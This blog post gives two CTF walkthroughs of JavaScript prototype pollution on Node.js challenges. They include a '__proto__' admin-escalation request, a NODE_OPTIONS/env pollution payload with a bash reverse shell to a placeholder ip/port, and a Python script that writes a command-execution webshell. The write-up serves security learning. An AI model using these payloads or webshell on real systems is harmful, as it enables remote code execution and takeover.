<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"><meta name="author" content="userq"><meta name="renderer" content="webkit"><meta name="copyright" content="userq"><meta name="keywords" content="MyBlog"><meta name="description" content="MyBlog"><meta name="Cache-Control" content="no-cache"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><title>javascript原型链污染 · Mr.cheng's Blog</title><link rel="stylesheet" href="/css/style.css?v=2018.7.9"><link rel="stylesheet" href="/css/animation.css?v=2018.7.9"><link rel="icon" href="/img/assets/favicon.ico"><link rel="stylesheet" href="https://cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css?version=1.5.6"><!-- scripts--><script>(function( w ){
  "use strict";
  // rel=preload support test
  if( !w.loadCSS ){
    w.loadCSS = function(){};
  }
  // define on the loadCSS obj
  var rp = loadCSS.relpreload = {};
  // rel=preload feature support test
  // runs once and returns a function for compat purposes
  rp.support = (function(){
    var ret;
    try {
      ret = w.document.createElement( "link" ).relList.supports( "preload" );
    } catch (e) {
      ret = false;
    }
    return function(){
      return ret;
    };
  })();

  // if preload isn't supported, get an asynchronous load by using a non-matching media attribute
  // then change that media back to its intended value on load
  rp.bindMediaToggle = function( link ){
    // remember existing media attr for ultimate state, or default to 'all'
    var finalMedia = link.media || "all";

    function enableStylesheet(){
      link.media = finalMedia;
    }

    // bind load handlers to enable media
    if( link.addEventListener ){
      link.addEventListener( "load", enableStylesheet );
    } else if( link.attachEvent ){
      link.attachEvent( "onload", enableStylesheet );
    }

    // Set rel and non-applicable media type to start an async request
    // note: timeout allows this to happen async to let rendering continue in IE
    setTimeout(function(){
      link.rel = "stylesheet";
      link.media = "only x";
    });
    // also enable media after 3 seconds,
    // which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
    setTimeout( enableStylesheet, 3000 );
  };

  // loop through link elements in DOM
  rp.poly = function(){
    // double check this to prevent external calls from running
    if( rp.support() ){
      return;
    }
    var links = w.document.getElementsByTagName( "link" );
    for( var i = 0; i < links.length; i++ ){
      var link = links[ i ];
      // qualify links to those with rel=preload and as=style attrs
      if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
        // prevent rerunning on link
        link.setAttribute( "data-loadcss", true );
        // bind listeners to toggle media back
        rp.bindMediaToggle( link );
      }
    }
  };

  // if unsupported, run the polyfill
  if( !rp.support() ){
    // run once at least
    rp.poly();

    // rerun poly on an interval until onload
    var run = w.setInterval( rp.poly, 500 );
    if( w.addEventListener ){
      w.addEventListener( "load", function(){
        rp.poly();
        w.clearInterval( run );
      } );
    } else if( w.attachEvent ){
      w.attachEvent( "onload", function(){
        rp.poly();
        w.clearInterval( run );
      } );
    }
  }


  // commonjs
  if( typeof exports !== "undefined" ){
    exports.loadCSS = loadCSS;
  }
  else {
    w.loadCSS = loadCSS;
  }
}( typeof global !== "undefined" ? global : this ) );</script><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" defer></script><script src="/js/main.js?v=2018.7.9" defer></script><!-- fancybox--><link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'"><script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script><!-- busuanzi--><script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script><meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="MyBlog" type="application/atom+xml">
</head><body><section class="profile-close" id="cxo-profile"><div class="profile-avatar"><i class="fa fa-caret-left"></i><img src="/img/assets/cat.png"></div><!--.profile-saying
  i.fa.fa-comment
  .saying--><div class="cxo-profile-inner"><div class="profile-name">userq</div><div class="profile-signature">for me</div><div class="friends"><div>FRIENDS</div><span><a href="//1768161086.github.io/" target="_black">friendA</a></span><span><a href="//github.com/" target="_black">friendB</a></span><span><a href="//github.com/" target="_black">friendC</a></span></div><div class="read-progress"></div></div></section><header id="cxo-intro" style="height: 70vh;background-image: url(/img/intro/index-bg.png);"><nav id="cxo-intro-nav"><section><div class="intro-nav-title"><a href="/">Mr.cheng's Blog</a></div><div class="intro-nav-label-box"><a href="/">Home</a><a href="/about/">About</a><a href="/archives/">Archives</a><a href="/tags/">Tags</a></div><i class="fa fa-bars intro-nav-menu"><div class="intro-nav-drop"><a href="/">Home</a><a href="/about/">About</a><a href="/archives/">Archives</a><a href="/tags/">Tags</a></div></i><div class="clear"></div></section></nav><h1 class="post-title">javascript原型链污染</h1><div class="post-intros"><div class="post-intro-meta"><span class="post-intro-time"><i class="post-intro-calendar fa fa-calendar"></i><span>2025-03-31</span></span></div></div></header><article class="cxo-up" id="cxo-content-outer"><section id="cxo-content-inner"><article class="article-entry" id="post"><h2 id="攻防世界-wife-wife"><a href="#攻防世界-wife-wife" class="headerlink" title="攻防世界_wife_wife"></a>攻防世界_wife_wife</h2><p>1.由于使用了assign()，因此存在Javascript原型链污染的漏洞。</p>
<p>2.进入就是一个登陆界面，尝试sql注入，用御剑扫描，都没有新发现。</p>
<p>3.注册页面，有一个<code>is admin</code>选项，想要得到正确的flag必须注册admin的账号</p>
<p>4.当勾选<code>is admin</code>时，必须填入邀请码，否则无法注册</p>
<p>5.Javascript原型链污染,利用该漏洞的前提是后端使用<strong>Node.js</strong>语言,使用wappalyzer</p>
<p>6.在注册时输入错误的邀请码，返回如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;username&quot;:&quot;1&quot;,&quot;password&quot;:&quot;2&quot;,&quot;isAdmin&quot;:true,&quot;inviteCode&quot;:&quot;123&quot;&#125;</span><br><span class="line">返回：invalid</span><br></pre></td></tr></table></figure>

<p>7.在请求报文中，可以看到有isAdmin参数，使用Javascript原型链污染，更改请求报文</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;username&quot;:&quot;1&quot;,&quot;password&quot;:&quot;2&quot;,</span><br><span class="line">&quot;__proto__&quot;:&#123;</span><br><span class="line">&quot;isAdmin&quot;:true&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>8.管理员用户创建成功，使用该用户登录即可拿到flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0CatCTF&#123;test_flag_hw_c@n_I_l1ve_w1th0ut_nilou&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Newctf2024-ezpollute"><a href="#Newctf2024-ezpollute" class="headerlink" title="Newctf2024-ezpollute"></a>Newctf2024-ezpollute</h2><p>根据题目名称可知，这是一道 JavaScript 的原型链污染题</p>
<p>1.查看部署文件，可以得知 Node.js 版本为 16，并且使用了 <code>node-dev</code> 热部署启动</p>
<p>2.审计 <code>index.js</code>，<code>/config</code> 路由下调用了 <code>merge</code> 函数，<code>merge</code> 函数意味着可能存在的原型链污染漏洞</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">router.post(&quot;/config&quot;, async (ctx) =&gt; &#123;</span><br><span class="line">  jsonData = ctx.request.rawBody || &quot;&#123;&#125;&quot;;</span><br><span class="line">  token = ctx.cookies.get(&quot;token&quot;);</span><br><span class="line">  if (!token) &#123;</span><br><span class="line">    return (ctx.body = &#123;</span><br><span class="line">      code: 0,</span><br><span class="line">      msg: &quot;Upload Photo First&quot;,</span><br><span class="line">    &#125;);</span><br><span class="line">  &#125;</span><br><span class="line">  const [err, userID] = decodeToken(token);</span><br><span class="line">  if (err) &#123;</span><br><span class="line">    return (ctx.body = &#123;</span><br><span class="line">      code: 0,</span><br><span class="line">      msg: &quot;Invalid Token&quot;,</span><br><span class="line">    &#125;);</span><br><span class="line">  &#125;</span><br><span class="line">  userConfig = JSON.parse(jsonData);</span><br><span class="line">  try &#123;</span><br><span class="line">    finalConfig = clone(defaultWaterMarkConfig);</span><br><span class="line">    // 这里喵</span><br><span class="line">    merge(finalConfig, userConfig);</span><br><span class="line">    fs.writeFileSync(path.join(__dirname, &quot;uploads&quot;, userID, &quot;config.json&quot;), JSON.stringify(finalConfig));</span><br><span class="line">    ctx.body = &#123;</span><br><span class="line">      code: 1,</span><br><span class="line">      msg: &quot;Config updated successfully&quot;,</span><br><span class="line">    &#125;;</span><br><span class="line">  &#125; catch (e) &#123;</span><br><span class="line">    ctx.body = &#123;</span><br><span class="line">      code: 0,</span><br><span class="line">      msg: &quot;Some error occurred&quot;,</span><br><span class="line">    &#125;;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<p>3.<code>merge</code> 函数在 <code>/util/merge.js</code> 中，虽然过滤了 <code>proto</code>，但我们可以通过 <code>constructor.prototype</code> 来绕过限制</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">// /util/merge.js</span><br><span class="line">function merge(target, source) &#123;</span><br><span class="line">  if (!isObject(target) || !isObject(source)) &#123;</span><br><span class="line">    return target;</span><br><span class="line">  &#125;</span><br><span class="line">  for (let key in source) &#123;</span><br><span class="line">    if (key === &quot;__proto__&quot;) continue;</span><br><span class="line">    if (source[key] === &quot;&quot;) continue;</span><br><span class="line">    if (isObject(source[key]) &amp;&amp; key in target) &#123;</span><br><span class="line">      target[key] = merge(target[key], source[key]);</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">      target[key] = source[key];</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  return target;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>4.<code>/process</code> 路由调用了 <code>fork</code>，创建了一个 JavaScript 子进程用于水印添加</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">try &#123;</span><br><span class="line">  await new Promise((resolve, reject) =&gt; &#123;</span><br><span class="line">    // 这里喵</span><br><span class="line">    const proc = fork(PhotoProcessScript, [userDir], &#123; silent: true &#125;);</span><br><span class="line"></span><br><span class="line">    proc.on(&quot;close&quot;, (code) =&gt; &#123;</span><br><span class="line">      if (code === 0) &#123;</span><br><span class="line">        resolve(&quot;success&quot;);</span><br><span class="line">      &#125; else &#123;</span><br><span class="line">        reject(new Error(&quot;An error occurred during execution&quot;));</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;);</span><br><span class="line"></span><br><span class="line">    proc.on(&quot;error&quot;, (err) =&gt; &#123;</span><br><span class="line">      reject(new Error(`Failed to start subprocess: $&#123;err.message&#125;`));</span><br><span class="line">    &#125;);</span><br><span class="line">  &#125;);</span><br><span class="line">  ctx.body = &#123;</span><br><span class="line">    code: 1,</span><br><span class="line">    msg: &quot;Photos processed successfully&quot;,</span><br><span class="line">  &#125;;</span><br><span class="line">&#125; catch (error) &#123;</span><br><span class="line">  ctx.body = &#123;</span><br><span class="line">    code: 0,</span><br><span class="line">    msg: &quot;some error occurred&quot;,</span><br><span class="line">  &#125;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>5.结合之前的原型链污染漏洞，我们污染 <code>NODE_OPTIONS</code> 和 <code>env</code>，在 <code>env</code> 中写入恶意代码，<code>fork</code> 在创建子进程时就会首先加载恶意代码，从而实现 RCE</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">payload = &#123;</span><br><span class="line">    &quot;constructor&quot;: &#123;</span><br><span class="line">        &quot;prototype&quot;: &#123;</span><br><span class="line">            &quot;NODE_OPTIONS&quot;: &quot;--require /proc/self/environ&quot;,</span><br><span class="line">            &quot;env&quot;: &#123;</span><br><span class="line">                 &quot;A&quot;:&quot;require(\&quot;child_process\&quot;).execSync(\&quot;bash -c \&#x27;bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1\&#x27;\&quot;)//&quot;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"># 需要注意在 Payload 最后面有注释符 `//`，这里的思路跟 SQL 注入很像</span><br></pre></td></tr></table></figure>

<p>考虑到新生可能没有云服务器来反弹 shell，因此在赛题设计时选择了热部署启动</p>
<p>除了弹 shell，还可以通过写 WebShell 覆盖 <code>index.js</code>，从而实现有回显 RCE，或者把 flag 输出到 <code>static</code> 目录下读也可以</p>
<p>比赛时题目环境并没有出网，弹不了 shell，只能通过后两种方式来做，这里给出写 WebShell 的做法</p>
<blockquote>
<p>热部署</p>
<p>就是在应用正在运行的时候升级软件，却不需要重新启动应用</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import re</span><br><span class="line">import base64</span><br><span class="line">from time import sleep</span><br><span class="line"></span><br><span class="line">url = &quot;http://url:port&quot;</span><br><span class="line"></span><br><span class="line"># 获取 token</span><br><span class="line"># 随便发送点图片获取 token</span><br><span class="line">files = [</span><br><span class="line">    (&#x27;images&#x27;, (&#x27;anno.png&#x27;, open(&#x27;./1.png&#x27;, &#x27;rb&#x27;), &#x27;image/png&#x27;)),</span><br><span class="line">    (&#x27;images&#x27;, (&#x27;soyo.png&#x27;, open(&#x27;./2.png&#x27;, &#x27;rb&#x27;), &#x27;image/png&#x27;))</span><br><span class="line">]</span><br><span class="line">res = requests.post(url + &quot;/upload&quot;, files=files)</span><br><span class="line">token = res.headers.get(&#x27;Set-Cookie&#x27;)</span><br><span class="line">match = re.search(r&#x27;token=([a-f0-9\-\.]+)&#x27;, token)</span><br><span class="line">if match:</span><br><span class="line">    token = match.group(1)</span><br><span class="line">    print(f&quot;[+] token: &#123;token&#125;&quot;)</span><br><span class="line">headers = &#123;</span><br><span class="line">    &#x27;Cookie&#x27;: f&#x27;token=&#123;token&#125;&#x27;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"># 通过原型链污染 env 注入恶意代码即可 RCE</span><br><span class="line"></span><br><span class="line"># 写入 WebShell</span><br><span class="line">webshell = &quot;&quot;&quot;</span><br><span class="line">const Koa = require(&#x27;koa&#x27;)</span><br><span class="line">const Router = require(&#x27;koa-router&#x27;)</span><br><span class="line">const app = new Koa()</span><br><span class="line">const router = new Router()</span><br><span class="line"></span><br><span class="line">router.get(&quot;/webshell&quot;, async (ctx) =&gt; &#123;</span><br><span class="line">    const &#123;cmd&#125; = ctx.query</span><br><span class="line">    res = require(&#x27;child_process&#x27;).execSync(cmd).toString()</span><br><span class="line">    return ctx.body = &#123;</span><br><span class="line">        res</span><br><span class="line">    &#125;</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line">app.use(router.routes())</span><br><span class="line">app.listen(3000, () =&gt; &#123;</span><br><span class="line">    console.log(&#x27;http://127.0.0.1:3000&#x27;)</span><br><span class="line">&#125;)</span><br><span class="line">&quot;&quot;&quot;</span><br><span class="line"></span><br><span class="line"># 将 WebShell 内容 Base64 编码</span><br><span class="line">encoded_webshell = base64.b64encode(webshell.encode()).decode()</span><br><span class="line"></span><br><span class="line"># Base64 解码后写入文件</span><br><span class="line">payload = &#123;</span><br><span class="line">    &quot;constructor&quot;: &#123;</span><br><span class="line">        &quot;prototype&quot;: &#123;</span><br><span class="line">            &quot;NODE_OPTIONS&quot;: &quot;--require /proc/self/environ&quot;,</span><br><span class="line">            &quot;env&quot;: &#123;</span><br><span class="line">                &quot;A&quot;: f&quot;require(\&quot;child_process\&quot;).execSync(\&quot;echo &#123;encoded_webshell&#125; | base64 -d &gt; /app/index.js\&quot;)//&quot;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"># 原型链污染</span><br><span class="line">requests.post(url + &quot;/config&quot;, json=payload, headers=headers)</span><br><span class="line"></span><br><span class="line"># 触发 fork 实现 RCE</span><br><span class="line">try:</span><br><span class="line">    requests.post(url + &quot;/process&quot;, headers=headers)</span><br><span class="line">except Exception as e:</span><br><span class="line">    pass</span><br><span class="line"></span><br><span class="line">sleep(2)</span><br><span class="line"># 访问有回显的 WebShell</span><br><span class="line">res = requests.get(url + &quot;/webshell?cmd=cat /flag&quot;)</span><br><span class="line">print(res.text)</span><br></pre></td></tr></table></figure>


</article><!-- lincense--><div class="license-wrapper"><p> <span>Author:  </span><a href="http://1768161086.github,io">userq</a></p><p> <span>Link:  </span><a href="http://1768161086.github,io/2025/03/31/javascript%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/">http://1768161086.github,io/2025/03/31/javascript%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/</a></p><p> <span>Copyright:  </span><span>All articles in this blog are licensed under <a rel="license noopener" target="_blank" href="https://creativecommons.org/licenses/by-nc-nd/3.0">CC BY-NC-SA 3.0</a> unless stating additionally.</span></p></div><div class="post-paginator"><a class="prevSlogan" href="/2025/04/01/svn%E6%B3%84%E9%9C%B2/" title="svn泄露"><span>< PreviousPost</span><br><span class="prevTitle">svn泄露</span></a><a class="nextSlogan" href="/2025/03/30/python-django/" title="python_django"><span>NextPost ></span><br><span class="nextTitle">python_django</span></a><div class="clear"></div></div><div id="comment"></div></section></article><footer id="cxo-footer-outer"><div id="cxo-footer-inner"><p class="footer-container"><span>Site by </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span> | theme </span><a target="_blank" rel="noopener" href="https://github.com/Longlongyu/hexo-theme-Cxo"><span>Cxo</span></a></p><i class="fa fa-user"> </i><span id="busuanzi_value_site_uv"></span><span> | </span><i class="fa fa-eye"> </i><span id="busuanzi_value_site_pv"></span></div></footer><!-- catelog--><div class="toc-wrapper" style="top: 70vh;"><div class="toc-catalog"><i class="fa fa-list"> </i><span>CATALOG</span></div><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C-wife-wife"><span class="toc-number">1.</span> <span class="toc-text">攻防世界_wife_wife</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Newctf2024-ezpollute"><span class="toc-number">2.</span> <span class="toc-text">Newctf2024-ezpollute</span></a></li></ol></div><!-- top--><i class="fa fa-arrow-up close" id="go-up" aria-hidden="true"></i></body></html>